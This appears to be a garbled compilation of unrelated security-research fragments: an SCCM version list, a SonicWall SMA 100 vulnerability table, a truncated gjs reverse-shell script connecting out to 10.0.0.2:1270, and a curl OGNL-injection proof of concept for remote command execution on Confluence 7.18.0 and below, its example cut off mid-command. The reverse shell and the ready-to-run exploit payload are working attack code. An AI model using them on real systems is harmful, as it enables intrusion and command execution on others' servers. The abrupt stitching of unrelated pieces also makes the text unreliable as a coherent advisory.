- Endpoint Configuration Manager version: 2103
- Site version: 5.00.9049.1000
- Connected Cache version: 1.5.4.1512 (?)
- Site installed on Windows Server 2019 (10.0.17763.2366)
The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done using SMA 500v using firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.
Vector | Auth | Affected | Component | Vulnerability | CVSS Vector |
---|---|---|---|---|---|
Remote | Unauthenticated | 10.2.1.1-19sv | httpd | Stack-based buffer overflow | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Remote | Authenticated | Both | Multiple cgi | Command injection | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
Remote | Unauthenticated | 10.2.1.1-19sv | sonicfiles | File upload path traversal | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
Remote | Unauthenticated | Both | sonicfiles | CPU exhaustion | AV:N |
```javascript
// gjs shell.js
const Gio = imports.gi.Gio;
const GLib = imports.gi.GLib;
try {
    let connection = (new Gio.SocketClient()).connect_to_host("10.0.0.2:1270", null, null);
    let output = connection.get_output_stream();
    let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
```
The following curl proof of concept will exfiltrate the output of an executed command on Confluence 7.18.0 and below. The command below executes `whoami` and stores the result in the `X-Cmd-Response` HTTP header of the response.
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/
Example:
albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script